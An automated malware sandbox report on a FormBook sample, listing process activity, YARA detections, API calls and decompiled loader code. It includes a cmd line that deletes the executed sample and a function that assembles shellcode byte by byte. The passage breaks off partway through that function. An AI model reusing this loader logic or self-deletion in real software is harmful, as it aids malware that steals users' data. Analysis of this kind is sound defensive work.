                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:17:42:15
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff6f22f0000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:17:42:34
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                  Imagebase:0x13e0000
                                                                  File size:29184 bytes
                                                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:17:42:38
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
                                                                  Imagebase:0x2a0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:17:42:39
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff61de10000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Executed Functions

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021C07B4
                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 021C07DE
                                                                    • ReadFile.KERNELBASE(00000000,00000000,021C026C,?,00000000), ref: 021C07F5
                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 021C0817
                                                                    • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,021C01AE,7FDFFF66), ref: 021C088A
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 021C0895
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,021C01AE), ref: 021C08E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.341132647.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                    • String ID:
                                                                    • API String ID: 656311269-0
                                                                    • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                                    • Instruction ID: 30d1bf957c64212f48b7ff9d38df64586d26949a4771151be86ba3feeb2b79e5
                                                                    • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                                    • Instruction Fuzzy Hash: A2619039E44708EBCB10DFA4C884BAEB7B6AF5C710F258069E515EB390E7749D41CB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 73%
                                                                    			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                                    				CHAR* _v8;
                                                                    				intOrPtr* _v24;
                                                                    				intOrPtr _v28;
                                                                    				struct _STARTUPINFOW _v96;
                                                                    				intOrPtr _v100;
                                                                    				intOrPtr _v104;
                                                                    				intOrPtr _v108;
                                                                    				unsigned int _t15;
                                                                    				signed int _t27;
                                                                    				intOrPtr _t29;
                                                                    				signed int _t35;
                                                                    				intOrPtr _t52;
                                                                    
                                                                    				_t47 = __edi;
                                                                    				_push(0xffffffff);
                                                                    				_push(0x4050f8);
                                                                    				_push(E00402D34);
                                                                    				_push( *[fs:0x0]);
                                                                    				 *[fs:0x0] = _t52;
                                                                    				_push(__edi);
                                                                    				_v28 = _t52 - 0x58;
                                                                    				_t15 = GetVersion();
                                                                    				 *0x40627c = 0;
                                                                    				_t35 = _t15 & 0x000000ff;
                                                                    				 *0x406278 = _t35;
                                                                    				 *0x406274 = _t35 << 8;
                                                                    				 *0x406270 = _t15 >> 0x10;
                                                                    				if(E00402C00(1) == 0) {
                                                                    					E00402186(0x1c);
                                                                    				}
                                                                    				if(E00402B32() == 0) {
                                                                    					E00402186(0x10);
                                                                    				}
                                                                    				_v8 = 0;
                                                                    				E00402976();
                                                                    				 *0x406694 = E004028D5();
                                                                    				 *0x406264 = E00402768();
                                                                    				E0040253F();
                                                                    				E00402487();
                                                                    				E004021AA();
                                                                    				_v96.dwFlags = 0;
                                                                    				GetStartupInfoW( &_v96);
                                                                    				_v104 = E00402442();
                                                                    				_t56 = _v96.dwFlags & 0x00000001;
                                                                    				if((_v96.dwFlags & 0x00000001) == 0) {
                                                                    					_t27 = 0xa;
                                                                    				} else {
                                                                    					_t27 = _v96.wShowWindow & 0x0000ffff;
                                                                    				}
                                                                    				_push(_t27);
                                                                    				_push(_v104);
                                                                    				_push(0);
                                                                    				_push(GetModuleHandleA(0)); // executed
                                                                    				_t29 = E00401000(); // executed
                                                                    				_v100 = _t29;
                                                                    				E004021D7(_t29);
                                                                    				_t31 = _v24;
                                                                    				_t40 =  *((intOrPtr*)( *_v24));
                                                                    				_v108 =  *((intOrPtr*)( *_v24));
                                                                    				return E004022CA(_t47, _t56, _t40, _t31);
                                                                    			}















                                                                    0x0040205a
                                                                    0x0040205d
                                                                    0x0040205f
                                                                    0x00402064
                                                                    0x0040206f
                                                                    0x00402070
                                                                    0x0040207c
                                                                    0x0040207d
                                                                    0x00402080
                                                                    0x0040208a
                                                                    0x00402092
                                                                    0x00402098
                                                                    0x004020a3
                                                                    0x004020ac
                                                                    0x004020bb
                                                                    0x004020bf
                                                                    0x004020c4
                                                                    0x004020cc
                                                                    0x004020d0
                                                                    0x004020d5
                                                                    0x004020d8
                                                                    0x004020db
                                                                    0x004020e5
                                                                    0x004020ef
                                                                    0x004020f4
                                                                    0x004020f9
                                                                    0x004020fe
                                                                    0x00402103
                                                                    0x0040210a
                                                                    0x00402115
                                                                    0x00402118
                                                                    0x0040211c
                                                                    0x00402126
                                                                    0x0040211e
                                                                    0x0040211e
                                                                    0x0040211e
                                                                    0x00402127
                                                                    0x00402128
                                                                    0x0040212b
                                                                    0x00402133
                                                                    0x00402134
                                                                    0x00402139
                                                                    0x0040213d
                                                                    0x00402142
                                                                    0x00402147
                                                                    0x00402149
                                                                    0x00402155

                                                                    APIs
                                                                    • GetVersion.KERNEL32 ref: 00402080
                                                                      • Part of subcall function 00402C00: HeapCreate.KERNELBASE(00000000,00001000,00000000,004020B8,00000001), ref: 00402C11
                                                                      • Part of subcall function 00402C00: HeapDestroy.KERNEL32 ref: 00402C2F
                                                                    • GetStartupInfoW.KERNEL32(?), ref: 0040210A
                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040212D
                                                                      • Part of subcall function 00402186: ExitProcess.KERNEL32 ref: 004021A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Heap$CreateDestroyExitHandleInfoModuleProcessStartupVersion
                                                                    • String ID:
                                                                    • API String ID: 999253471-0
                                                                    • Opcode ID: 42a54ab06592b256e06ea4350abeccc269e871f5c974d075d1cae72575f765e0
                                                                    • Instruction ID: ca130bf8b72715085ec676ada72c515ea2625b52bb235737e5627046e07fe321
                                                                    • Opcode Fuzzy Hash: 42a54ab06592b256e06ea4350abeccc269e871f5c974d075d1cae72575f765e0
                                                                    • Instruction Fuzzy Hash: D82151B1941705AADB18BFB59E0EA6E77B8EF04714F10413FF905BA2D1DABC4840CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00401000() {
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				char _v25;
                                                                    				char _v26;
                                                                    				char _v27;
                                                                    				char _v28;
                                                                    				char _v29;
                                                                    				char _v30;
                                                                    				char _v31;
                                                                    				char _v32;
                                                                    				char _v33;
                                                                    				char _v34;
                                                                    				char _v35;
                                                                    				char _v36;
                                                                    				char _v37;
                                                                    				char _v38;
                                                                    				char _v39;
                                                                    				char _v40;
                                                                    				char _v41;
                                                                    				char _v42;
                                                                    				char _v43;
                                                                    				char _v44;
                                                                    				char _v45;
                                                                    				char _v46;
                                                                    				char _v47;
                                                                    				char _v48;
                                                                    				char _v49;
                                                                    				char _v50;
                                                                    				char _v51;
                                                                    				char _v52;
                                                                    				char _v53;
                                                                    				char _v54;
                                                                    				char _v55;
                                                                    				char _v56;
                                                                    				char _v57;
                                                                    				char _v58;
                                                                    				char _v59;
                                                                    				char _v60;
                                                                    				char _v61;
                                                                    				char _v62;
                                                                    				char _v63;
                                                                    				char _v64;
                                                                    				char _v65;
                                                                    				char _v66;
                                                                    				char _v67;
                                                                    				char _v68;
                                                                    				char _v69;
                                                                    				char _v70;
                                                                    				char _v71;
                                                                    				char _v72;
                                                                    				char _v73;
                                                                    				char _v74;
                                                                    				char _v75;
                                                                    				char _v76;
                                                                    				char _v77;
                                                                    				char _v78;
                                                                    				char _v79;
                                                                    				char _v80;
                                                                    				char _v81;
                                                                    				char _v82;
                                                                    				char _v83;
                                                                    				char _v84;
                                                                    				char _v85;
                                                                    				char _v86;
                                                                    				char _v87;
                                                                    				char _v88;
                                                                    				char _v89;
                                                                    				char _v90;
                                                                    				char _v91;
                                                                    				char _v92;
                                                                    				char _v93;
                                                                    				char _v94;
                                                                    				char _v95;
                                                                    				char _v96;
                                                                    				char _v97;
                                                                    				char _v98;
                                                                    				char _v99;
                                                                    				char _v100;
                                                                    				char _v101;
                                                                    				char _v102;
                                                                    				char _v103;
                                                                    				char _v104;
                                                                    				char _v105;
                                                                    				char _v106;
                                                                    				char _v107;
                                                                    				char _v108;
                                                                    				char _v109;
                                                                    				char _v110;
                                                                    				char _v111;
                                                                    				char _v112;
                                                                    				char _v113;
                                                                    				char _v114;
                                                                    				char _v115;
                                                                    				char _v116;
                                                                    				char _v117;
                                                                    				char _v118;
                                                                    				char _v119;
                                                                    				char _v120;
                                                                    				char _v121;
                                                                    				char _v122;
                                                                    				char _v123;
                                                                    				char _v124;
                                                                    				char _v125;
                                                                    				char _v126;
                                                                    				char _v127;
                                                                    				char _v128;
                                                                    				char _v129;
                                                                    				char _v130;
                                                                    				char _v131;
                                                                    				char _v132;
                                                                    				char _v133;
                                                                    				char _v134;
                                                                    				char _v135;
                                                                    				char _v136;
                                                                    				char _v137;
                                                                    				char _v138;
                                                                    				char _v139;
                                                                    				char _v140;
                                                                    				char _v141;
                                                                    				char _v142;
                                                                    				char _v143;
                                                                    				char _v144;
                                                                    				char _v145;
                                                                    				char _v146;
                                                                    				char _v147;
                                                                    				char _v148;
                                                                    				char _v149;
                                                                    				char _v150;
                                                                    				char _v151;
                                                                    				char _v152;
                                                                    				char _v153;
                                                                    				char _v154;
                                                                    				char _v155;
                                                                    				char _v156;
                                                                    				char _v157;
                                                                    				char _v158;
                                                                    				char _v159;
                                                                    				char _v160;
                                                                    				char _v161;
                                                                    				char _v162;
                                                                    				char _v163;
                                                                    				char _v164;
                                                                    				char _v165;
                                                                    				char _v166;
                                                                    				char _v167;
                                                                    				char _v168;
                                                                    				char _v169;
                                                                    				char _v170;
                                                                    				char _v171;
                                                                    				char _v172;
                                                                    				char _v173;
                                                                    				char _v174;
                                                                    				char _v175;
                                                                    				char _v176;
                                                                    				char _v177;
                                                                    				char _v178;
                                                                    				char _v179;
                                                                    				char _v180;
                                                                    				char _v181;
                                                                    				char _v182;
                                                                    				char _v183;
                                                                    				char _v184;
                                                                    				char _v185;
                                                                    				char _v186;
                                                                    				char _v187;
                                                                    				char _v188;
                                                                    				char _v189;
                                                                    				char _v190;
                                                                    				char _v191;
                                                                    				char _v192;
                                                                    				char _v193;
                                                                    				char _v194;
                                                                    				char _v195;
                                                                    				char _v196;
                                                                    				char _v197;
                                                                    				char _v198;
                                                                    				char _v199;
                                                                    				char _v200;
                                                                    				char _v201;
                                                                    				char _v202;
                                                                    				char _v203;
                                                                    				char _v204;
                                                                    				char _v205;
                                                                    				char _v206;
                                                                    				char _v207;
                                                                    				char _v208;
                                                                    				char _v209;
                                                                    				char _v210;
                                                                    				char _v211;
                                                                    				char _v212;
                                                                    				char _v213;
                                                                    				char _v214;
                                                                    				char _v215;
                                                                    				char _v216;
                                                                    				char _v217;
                                                                    				char _v218;
                                                                    				char _v219;
                                                                    				char _v220;
                                                                    				char _v221;
                                                                    				char _v222;
                                                                    				char _v223;
                                                                    				char _v224;
                                                                    				char _v225;
                                                                    				char _v226;
                                                                    				char _v227;
                                                                    				char _v228;
                                                                    				char _v229;
                                                                    				char _v230;
                                                                    				char _v231;
                                                                    				char _v232;
                                                                    				char _v233;
                                                                    				char _v234;
                                                                    				char _v235;
                                                                    				char _v236;
                                                                    				char _v237;
                                                                    				char _v238;
                                                                    				char _v239;
                                                                    				char _v240;
                                                                    				char _v241;
                                                                    				char _v242;
                                                                    				char _v243;
                                                                    				char _v244;
                                                                    				char _v245;
                                                                    				char _v246;
                                                                    				char _v247;
                                                                    				char _v248;
                                                                    				char _v249;
                                                                    				char _v250;
                                                                    				char _v251;
                                                                    				char _v252;
                                                                    				char _v253;
                                                                    				char _v254;
                                                                    				char _v255;
                                                                    				char _v256;
                                                                    				char _v257;
                                                                    				char _v258;
                                                                    				char _v259;
                                                                    				char _v260;
                                                                    				char _v261;
                                                                    				char _v262;
                                                                    				char _v263;
                                                                    				char _v264;
                                                                    				char _v265;
                                                                    				char _v266;
                                                                    				char _v267;
                                                                    				char _v268;
                                                                    				char _v269;
                                                                    				char _v270;
                                                                    				char _v271;
                                                                    				char _v272;
                                                                    				char _v273;
                                                                    				char _v274;
                                                                    				char _v275;
                                                                    				char _v276;
                                                                    				char _v277;
                                                                    				char _v278;
                                                                    				char _v279;
                                                                    				char _v280;
                                                                    				char _v281;
                                                                    				char _v282;
                                                                    				char _v283;
                                                                    				char _v284;
                                                                    				char _v285;
                                                                    				char _v286;
                                                                    				char _v287;
                                                                    				char _v288;
                                                                    				char _v289;
                                                                    				char _v290;
                                                                    				char _v291;
                                                                    				char _v292;
                                                                    				char _v293;
                                                                    				char _v294;
                                                                    				char _v295;
                                                                    				char _v296;
                                                                    				char _v297;
                                                                    				char _v298;
                                                                    				char _v299;
                                                                    				char _v300;
                                                                    				char _v301;
                                                                    				char _v302;
                                                                    				char _v303;
                                                                    				char _v304;
                                                                    				char _v305;
                                                                    				char _v306;
                                                                    				char _v307;
                                                                    				char _v308;
                                                                    				char _v309;
                                                                    				char _v310;
                                                                    				char _v311;
                                                                    				char _v312;
                                                                    				char _v313;
                                                                    				char _v314;
                                                                    				char _v315;
                                                                    				char _v316;
                                                                    				char _v317;
                                                                    				char _v318;
                                                                    				char _v319;
                                                                    				char _v320;
                                                                    				char _v321;
                                                                    				char _v322;
                                                                    				char _v323;
                                                                    				char _v324;
                                                                    				char _v325;
                                                                    				char _v326;
                                                                    				char _v327;
                                                                    				char _v328;
                                                                    				char _v329;
                                                                    				char _v330;
                                                                    				char _v331;
                                                                    				char _v332;
                                                                    				char _v333;
                                                                    				char _v334;
                                                                    				char _v335;
                                                                    				char _v336;
                                                                    				char _v337;
                                                                    				char _v338;
                                                                    				char _v339;
                                                                    				char _v340;
                                                                    				char _v341;
                                                                    				char _v342;
                                                                    				char _v343;
                                                                    				char _v344;
                                                                    				char _v345;
                                                                    				char _v346;
                                                                    				char _v347;
                                                                    				char _v348;
                                                                    				char _v349;
                                                                    				char _v350;
                                                                    				char _v351;
                                                                    				char _v352;
                                                                    				char _v353;
                                                                    				char _v354;
                                                                    				char _v355;
                                                                    				char _v356;
                                                                    				char _v357;
                                                                    				char _v358;
                                                                    				char _v359;
                                                                    				char _v360;
                                                                    				char _v361;
                                                                    				char _v362;
                                                                    				char _v363;
                                                                    				char _v364;
                                                                    				char _v365;
                                                                    				char _v366;
                                                                    				char _v367;
                                                                    				char _v368;
                                                                    				char _v369;
                                                                    				char _v370;
                                                                    				char _v371;
                                                                    				char _v372;
                                                                    				char _v373;
                                                                    				char _v374;
                                                                    				char _v375;
                                                                    				char _v376;
                                                                    				char _v377;
                                                                    				char _v378;
                                                                    				char _v379;
                                                                    				char _v380;
                                                                    				char _v381;
                                                                    				char _v382;
                                                                    				char _v383;
                                                                    				char _v384;
                                                                    				char _v385;
                                                                    				char _v386;
                                                                    				char _v387;
                                                                    				char _v388;
                                                                    				char _v389;
                                                                    				char _v390;
                                                                    				char _v391;
                                                                    				char _v392;
                                                                    				char _v393;
                                                                    				char _v394;
                                                                    				char _v395;
                                                                    				char _v396;
                                                                    				char _v397;
                                                                    				char _v398;
                                                                    				char _v399;
                                                                    				char _v400;
                                                                    				char _v401;
                                                                    				char _v402;
                                                                    				char _v403;
                                                                    				char _v404;
                                                                    				char _v405;
                                                                    				char _v406;
                                                                    				char _v407;
                                                                    				char _v408;
                                                                    				char _v409;
                                                                    				char _v410;
                                                                    				char _v411;
                                                                    				char _v412;
                                                                    				char _v413;
                                                                    				char _v414;
                                                                    				char _v415;
                                                                    				char _v416;
                                                                    				char _v417;
                                                                    				char _v418;
                                                                    				char _v419;
                                                                    				char _v420;
                                                                    				char _v421;
                                                                    				char _v422;
                                                                    				char _v423;
                                                                    				char _v424;
                                                                    				char _v425;
                                                                    				char _v426;
                                                                    				char _v427;
                                                                    				char _v428;
                                                                    				char _v429;
                                                                    				char _v430;
                                                                    				char _v431;
                                                                    				char _v432;
                                                                    				char _v433;
                                                                    				char _v434;
                                                                    				char _v435;
                                                                    				char _v436;
                                                                    				char _v437;
                                                                    				char _v438;
                                                                    				char _v439;
                                                                    				char _v440;
                                                                    				char _v441;
                                                                    				char _v442;
                                                                    				char _v443;
                                                                    				char _v444;
                                                                    				char _v445;
                                                                    				char _v446;
                                                                    				char _v447;
                                                                    				char _v448;
                                                                    				char _v449;
                                                                    				char _v450;
                                                                    				char _v451;
                                                                    				char _v452;
                                                                    				char _v453;
                                                                    				char _v454;
                                                                    				char _v455;
                                                                    				char _v456;
                                                                    				char _v457;
                                                                    				char _v458;
                                                                    				char _v459;
                                                                    				char _v460;
                                                                    				char _v461;
                                                                    				char _v462;
                                                                    				char _v463;
                                                                    				char _v464;
                                                                    				char _v465;
                                                                    				char _v466;
                                                                    				char _v467;
                                                                    				char _v468;
                                                                    				char _v469;
                                                                    				char _v470;
                                                                    				char _v471;
                                                                    				char _v472;
                                                                    				char _v473;
                                                                    				char _v474;
                                                                    				char _v475;
                                                                    				char _v476;
                                                                    				char _v477;
                                                                    				char _v478;
                                                                    				char _v479;
                                                                    				char _v480;
                                                                    				char _v481;
                                                                    				char _v482;
                                                                    				char _v483;
                                                                    				char _v484;
                                                                    				char _v485;
                                                                    				char _v486;
                                                                    				char _v487;
                                                                    				char _v488;
                                                                    				char _v489;
                                                                    				char _v490;
                                                                    				char _v491;
                                                                    				char _v492;
                                                                    				char _v493;
                                                                    				char _v494;
                                                                    				char _v495;
                                                                    				char _v496;
                                                                    				char _v497;
                                                                    				char _v498;
                                                                    				char _v499;
                                                                    				char _v500;
                                                                    				char _v501;
                                                                    				char _v502;
                                                                    				char _v503;
                                                                    				char _v504;
                                                                    				char _v505;
                                                                    				char _v506;
                                                                    				char _v507;
                                                                    				char _v508;
                                                                    				char _v509;
                                                                    				char _v510;
                                                                    				char _v511;
                                                                    				char _v512;
                                                                    				char _v513;
                                                                    				char _v514;
                                                                    				char _v515;
                                                                    				char _v516;
                                                                    				char _v517;
                                                                    				char _v518;
                                                                    				char _v519;
                                                                    				char _v520;
                                                                    				char _v521;
                                                                    				char _v522;
                                                                    				char _v523;
                                                                    				char _v524;
                                                                    				char _v525;
                                                                    				char _v526;
                                                                    				char _v527;
                                                                    				char _v528;
                                                                    				char _v529;
                                                                    				char _v530;
                                                                    				char _v531;
                                                                    				char _v532;
                                                                    				char _v533;
                                                                    				char _v534;
                                                                    				char _v535;
                                                                    				char _v536;
                                                                    				char _v537;
                                                                    				char _v538;
                                                                    				char _v539;
                                                                    				char _v540;
                                                                    				char _v541;
                                                                    				char _v542;
                                                                    				char _v543;
                                                                    				char _v544;
                                                                    				char _v545;
                                                                    				char _v546;
                                                                    				char _v547;
                                                                    				char _v548;
                                                                    				char _v549;
                                                                    				char _v550;
                                                                    				char _v551;
                                                                    				char _v552;
                                                                    				char _v553;
                                                                    				char _v554;
                                                                    				char _v555;
                                                                    				char _v556;
                                                                    				char _v557;
                                                                    				char _v558;
                                                                    				char _v559;
                                                                    				char _v560;
                                                                    				char _v561;
                                                                    				char _v562;
                                                                    				char _v563;
                                                                    				char _v564;
                                                                    				char _v565;
                                                                    				char _v566;
                                                                    				char _v567;
                                                                    				char _v568;
                                                                    				char _v569;
                                                                    				char _v570;
                                                                    				char _v571;
                                                                    				char _v572;
                                                                    				char _v573;
                                                                    				char _v574;
                                                                    				char _v575;
                                                                    				char _v576;
                                                                    				char _v577;
                                                                    				char _v578;
                                                                    				char _v579;
                                                                    				char _v580;
                                                                    				char _v581;
                                                                    				char _v582;
                                                                    				char _v583;
                                                                    				char _v584;
                                                                    				char _v585;
                                                                    				char _v586;
                                                                    				char _v587;
                                                                    				char _v588;
                                                                    				char _v589;
                                                                    				char _v590;
                                                                    				char _v591;
                                                                    				char _v592;
                                                                    				char _v593;
                                                                    				char _v594;
                                                                    				char _v595;
                                                                    				char _v596;
                                                                    				char _v597;
                                                                    				char _v598;
                                                                    				char _v599;
                                                                    				char _v600;
                                                                    				char _v601;
                                                                    				char _v602;
                                                                    				char _v603;
                                                                    				char _v604;
                                                                    				char _v605;
                                                                    				char _v606;
                                                                    				char _v607;
                                                                    				char _v608;
                                                                    				char _v609;
                                                                    				char _v610;
                                                                    				char _v611;
                                                                    				char _v612;
                                                                    				char _v613;
                                                                    				char _v614;
                                                                    				char _v615;
                                                                    				char _v616;
                                                                    				char _v617;
                                                                    				char _v618;
                                                                    				char _v619;
                                                                    				char _v620;
                                                                    				char _v621;
                                                                    				char _v622;
                                                                    				char _v623;
                                                                    				char _v624;
                                                                    				char _v625;
                                                                    				char _v626;
                                                                    				char _v627;
                                                                    				char _v628;
                                                                    				char _v629;
                                                                    				char _v630;
                                                                    				char _v631;
                                                                    				char _v632;
                                                                    				char _v633;
                                                                    				char _v634;
                                                                    				char _v635;
                                                                    				_Unknown_base(*)() _v636;
                                                                    				void* _v1636;
                                                                    				int _t637;
                                                                    
                                                                    				_v636 = 0xe9;
                                                                    				_v635 = 0x90;
                                                                    				_v634 = 0;
                                                                    				_v633 = 0;
                                                                    				_v632 = 0;
                                                                    				_v631 = 0x55;
                                                                    				_v630 = 0x8b;
                                                                    				_v629 = 0xec;
                                                                    				_v628 = 0x56;
                                                                    				_v627 = 0x8b;
                                                                    				_v626 = 0x75;
                                                                    				_v625 = 8;
                                                                    				_v624 = 0xba;
                                                                    				_v623 = 0x23;
                                                                    				_v622 = 0x19;
                                                                    				_v621 = 0;
                                                                    				_v620 = 0;
                                                                    				_v619 = 0x57;
                                                                    				_v618 = 0xeb;
                                                                    				_v617 = 0xe;
                                                                    				_v616 = 0x8b;
                                                                    				_v615 = 0xca;
                                                                    				_v614 = 0xd1;
                                                                    				_v613 = 0xe8;
                                                                    				_v612 = 0xc1;
                                                                    				_v611 = 0xe1;
                                                                    				_v610 = 7;
                                                                    				_v609 = 0x46;
                                                                    				_v608 = 0xb;
                                                                    				_v607 = 0xc8;
                                                                    				_v606 = 3;
                                                                    				_v605 = 0xcf;
                                                                    				_v604 = 3;
                                                                    				_v603 = 0xd1;
                                                                    				_v602 = 0xf;
                                                                    				_v601 = 0xbe;
                                                                    				_v600 = 0x3e;
                                                                    				_v599 = 0x8b;
                                                                    				_v598 = 0xc2;
                                                                    				_v597 = 0x85;
                                                                    				_v596 = 0xff;
                                                                    				_v595 = 0x75;
                                                                    				_v594 = 0xe9;
                                                                    				_v593 = 0x5f;
                                                                    				_v592 = 0x5e;
                                                                    				_v591 = 0x5d;
                                                                    				_v590 = 0xc3;
                                                                    				_v589 = 0x55;
                                                                    				_v588 = 0x8b;
                                                                    				_v587 = 0xec;
                                                                    				_v586 = 0x51;
                                                                    				_v585 = 0x51;
                                                                    				_v584 = 0x53;
                                                                    				_v583 = 0x56;
                                                                    				_v582 = 0x57;
                                                                    				_v581 = 0x8b;
                                                                    				_v580 = 0x7d;
                                                                    				_v579 = 8;
                                                                    				_v578 = 0x33;
                                                                    				_v577 = 0xf6;
                                                                    				_v576 = 0x8b;
                                                                    				_v575 = 0x47;
                                                                    				_v574 = 0x3c;
                                                                    				_v573 = 0x8b;
                                                                    				_v572 = 0x44;
                                                                    				_v571 = 0x38;
                                                                    				_v570 = 0x78;
                                                                    				_v569 = 3;
                                                                    				_v568 = 0xc7;
                                                                    				_v567 = 0x8b;
                                                                    				_v566 = 0x50;
                                                                    				_v565 = 0x20;
                                                                    				_v564 = 0x8b;
                                                                    				_v563 = 0x58;
                                                                    				_v562 = 0x1c;
                                                                    				_v561 = 3;
                                                                    				_v560 = 0xd7;
                                                                    				_v559 = 0x8b;
                                                                    				_v558 = 0x48;
                                                                    				_v557 = 0x24;
                                                                    				_v556 = 3;
                                                                    				_v555 = 0xdf;
                                                                    				_v554 = 0x8b;
                                                                    				_v553 = 0x40;
                                                                    				_v552 = 0x18;
                                                                    				_v551 = 3;
                                                                    				_v550 = 0xcf;
                                                                    				_v549 = 0x89;
                                                                    				_v548 = 0x55;
                                                                    				_v547 = 0xfc;
                                                                    				_v546 = 0x89;
                                                                    				_v545 = 0x4d;
                                                                    				_v544 = 0xf8;
                                                                    				_v543 = 0x89;
                                                                    				_v542 = 0x45;
                                                                    				_v541 = 8;
                                                                    				_v540 = 0x85;
                                                                    				_v539 = 0xc0;
                                                                    				_v538 = 0x74;
                                                                    				_v537 = 0x1a;
                                                                    				_v536 = 0x8b;
                                                                    				_v535 = 4;
                                                                    				_v534 = 0xb2;
                                                                    				_v533 = 3;
                                                                    				_v532 = 0xc7;
                                                                    				_v531 = 0x50;
